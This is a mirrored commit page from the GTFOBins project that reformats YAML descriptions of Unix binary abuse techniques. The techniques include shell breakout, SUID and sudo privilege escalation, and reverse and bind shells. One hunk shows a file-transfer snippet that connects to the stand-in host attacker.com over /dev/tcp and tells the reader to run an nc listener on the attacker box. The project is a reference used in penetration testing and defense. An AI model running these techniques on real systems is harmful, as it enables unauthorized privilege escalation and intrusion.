mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Fix YAML literal blocks
This commit is contained in:
parent
b96f6e9a49
commit
5a1c87e7c5
@ -1,55 +1,84 @@
|
|||||||
execute-interactive:
|
execute-interactive:
|
||||||
label: Interactive execute
|
label: Interactive execute
|
||||||
description: It executes interactive commands that may be used to break out from restricted shells.
|
description: |
|
||||||
|
It executes interactive commands that may be used to break out from
|
||||||
|
restricted shells.
|
||||||
|
|
||||||
execute-non-interactive:
|
execute-non-interactive:
|
||||||
label: Non-interactive execute
|
label: Non-interactive execute
|
||||||
description: It executes non-interactive commands that may be used to break out from restricted shells.
|
description: |
|
||||||
|
It executes non-interactive commands that may be used to break out from
|
||||||
|
restricted shells.
|
||||||
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
label: SUID
|
label: SUID
|
||||||
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems like Debian that allow to run a SUID shell by default.
|
description: |
|
||||||
|
It runs with the SUID bit set and may be exploited to access the file
|
||||||
|
system, escalate or maintain access with elevated privileges working as a
|
||||||
|
SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems
|
||||||
|
like Debian that allow to run a SUID shell by default.
|
||||||
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
label: Limited SUID
|
label: Limited SUID
|
||||||
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. Running `/bin/sh` only works on Debian systems that allow SUID shell execution by default.
|
description: |
|
||||||
|
It runs with the SUID bit set and may be exploited to access the file
|
||||||
|
system, escalate or maintain access with elevated privileges working as a
|
||||||
|
SUID backdoor. Running `/bin/sh` only works on Debian systems that allow
|
||||||
|
SUID shell execution by default.
|
||||||
|
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
label: Sudo
|
label: Sudo
|
||||||
description: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`.
|
description: |
|
||||||
|
It runs in privileged context and may be used to access the file system,
|
||||||
|
escalate or maintain access with elevated privileges if enabled on `sudo`.
|
||||||
|
|
||||||
download:
|
download:
|
||||||
label: Download
|
label: Download
|
||||||
description: It can download remote files.
|
description: |
|
||||||
|
It can download remote files.
|
||||||
|
|
||||||
upload:
|
upload:
|
||||||
label: Upload
|
label: Upload
|
||||||
description: It can exfiltrate files on the network.
|
description: |
|
||||||
|
It can exfiltrate files on the network.
|
||||||
|
|
||||||
bind-shell-interactive:
|
bind-shell-interactive:
|
||||||
label: Interactive bind shell
|
label: Interactive bind shell
|
||||||
description: It can bind a shell to a local port to allow remote network access.
|
description: |
|
||||||
|
It can bind a shell to a local port to allow remote network access.
|
||||||
|
|
||||||
reverse-shell-interactive:
|
reverse-shell-interactive:
|
||||||
label: Interactive reverse shell
|
label: Interactive reverse shell
|
||||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
description: |
|
||||||
|
It can send back a reverse shell to a listening attacker to open a remote
|
||||||
|
network access.
|
||||||
|
|
||||||
bind-shell-non-interactive:
|
bind-shell-non-interactive:
|
||||||
label: Non-interactive bind shell
|
label: Non-interactive bind shell
|
||||||
description: It can bind a non-interactive shell to a local port to allow remote network access.
|
description: |
|
||||||
|
It can bind a non-interactive shell to a local port to allow remote network
|
||||||
|
access.
|
||||||
|
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
label: Non-interactive reverse shell
|
label: Non-interactive reverse shell
|
||||||
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
|
description: |
|
||||||
|
It can send back a non-interactive reverse shell to a listening attacker to
|
||||||
|
open a remote network access.
|
||||||
|
|
||||||
load-library:
|
load-library:
|
||||||
label: Library load
|
label: Library load
|
||||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
description: |
|
||||||
|
It loads shared libraries that may be used to run code in the binary
|
||||||
|
execution context.
|
||||||
|
|
||||||
file-read:
|
file-read:
|
||||||
label: File read
|
label: File read
|
||||||
description: It reads files and may be used to do privileged reads or disclose files outside a restricted file system.
|
description: |
|
||||||
|
It reads files and may be used to do privileged reads or disclose files
|
||||||
|
outside a restricted file system.
|
||||||
|
|
||||||
file-write:
|
file-write:
|
||||||
label: File write
|
label: File write
|
||||||
description: It writes files and may be used to do privileged writes or write files outside a restricted file system.
|
description: |
|
||||||
|
It writes files and may be used to do privileged writes or write files
|
||||||
|
outside a restricted file system.
|
||||||
|
@ -29,7 +29,7 @@ functions:
|
|||||||
3<>/dev/tcp/$RHOST/$RPORT \
|
3<>/dev/tcp/$RHOST/$RPORT \
|
||||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||||
code: |-
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_get
|
export LFILE=file_to_get
|
||||||
|
@ -1,5 +1,7 @@
|
|||||||
---
|
---
|
||||||
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example.
|
description: |
|
||||||
|
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
|
||||||
|
what GTFBins binaries are supported. Here some example.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
execute-interactive:
|
||||||
- code: busybox sh
|
- code: busybox sh
|
||||||
|
@ -1,6 +1,7 @@
|
|||||||
---
|
---
|
||||||
description: |
|
description: |
|
||||||
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:
|
`ld.so` is the Linux dynamic linker/loader, its filename and location might
|
||||||
|
change across distributions. The proper path is can be obtained with:
|
||||||
|
|
||||||
```
|
```
|
||||||
$ strings /proc/self/exe | head -1
|
$ strings /proc/self/exe | head -1
|
||||||
|
@ -1,5 +1,6 @@
|
|||||||
---
|
---
|
||||||
description: The read file content is corrupted by being sorted.
|
description: |
|
||||||
|
The read file content is corrupted by being sorted.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
|
@ -1,5 +1,6 @@
|
|||||||
---
|
---
|
||||||
description: It can only append data if the destination exists.
|
description: |
|
||||||
|
It can only append data if the destination exists.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
|
@ -1,5 +1,7 @@
|
|||||||
---
|
---
|
||||||
description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
|
description: |
|
||||||
|
The read file content is corrupted by replacing occurrences of `$'\b_'` to
|
||||||
|
terminal sequences and by converting tabs to spaces.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
|
@ -1,5 +1,6 @@
|
|||||||
---
|
---
|
||||||
description: The read file content is corrupted by squashing multiple adjacent lines.
|
description: |
|
||||||
|
The read file content is corrupted by squashing multiple adjacent lines.
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
|
Loading…
Reference in New Issue
Block a user